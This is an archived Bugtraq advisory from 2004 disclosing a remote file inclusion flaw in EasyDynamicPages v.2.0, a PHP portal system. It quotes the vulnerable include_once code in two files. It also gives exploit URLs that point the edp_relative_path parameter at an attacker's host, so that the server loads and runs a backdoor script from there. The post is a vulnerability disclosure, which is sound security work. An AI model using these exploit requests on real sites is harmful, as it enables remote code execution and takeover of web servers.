Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: include() vuln in EasyDynamicPages v.2.0

include() vuln in EasyDynamicPages v.2.0

From: Vietnamese Security Group <security_at_security.com.vn>
Date: 2 Jan 2004 15:18:21 -0000
('binary' encoding is not supported, stored as-is) Producr:EasyDynamicPages v.2.0: Advanced Portal Management System
Vendors:http://software.stoitsov.com
Bug :include()
Risk:Cao
Author:tsbeginnervn(c)
Web : www.security.com.vn

-------------------------------------
Introduction :
system, personal or business site or what you need.

The goal is to have an automated web site not only to distribute news and items with automated system but also easily to create and edit dynamic web pages (DynamicPages) without knowledge of html, php or whether you need to develop websites.

Each user can submit news, comments, discuss articles and more. Registered users and administrators can additionally create and modify DynamicPages.

Plugins included with the install are BookMarks manager, E-Publish, E-card and E-gallery systems and Yahoo-like E-Classifier system.

Features: design/content separation, web admin, user-customizable theme management, SiteConfig manager, PageEdit manager, Search engine, Left-Right blocks system, editor to add news and for content management, modular DynamicalPages structure, system self install and more.

Written in PHP, works on windows, unix, linux and requires PHP, Apache and MySQL.


Vuln in files:
/admin/config.php va /dynamicpages/fast/config_page.php
==================

The Code in File /admin/config.php :

++++++++++++++++++++++++
include_once $edp_relative_path."admin/serverdata.php";
++++++++++++++++++++++++


Exploit:
http://victim/admin/config.php/edp_relative_path=http://attacker/
Voi host cua attacker:
http://attacker/admin/serverdata.php

The code in File /dynamicpages/fast/config_page.php :

++++++++++++++++++++++++
$ResultHtml="";
if ($do=="add_page") {
switch($du) {
case "site": include_once $edp_relative_path."admin/site_settings.php"; break;
case "dpage": include_once $edp_relative_path."admin/dpage_settings.php"; break;
++++++++++++++++++++++++

Exploit:
http://victim/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://attacker/

If a attacker have Script backdoor in URL :
http://attacker/admin/site_settings.php

Then acttacker exploit :

http://victim/dynamicpages/fast/config_page.php?do=add_page&du=dpage&edp_relative_path=http://attacker/


====================================================================

tsbeginnervn - BugSearch
www.security.com.vn
Received on Jan 02 2004
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos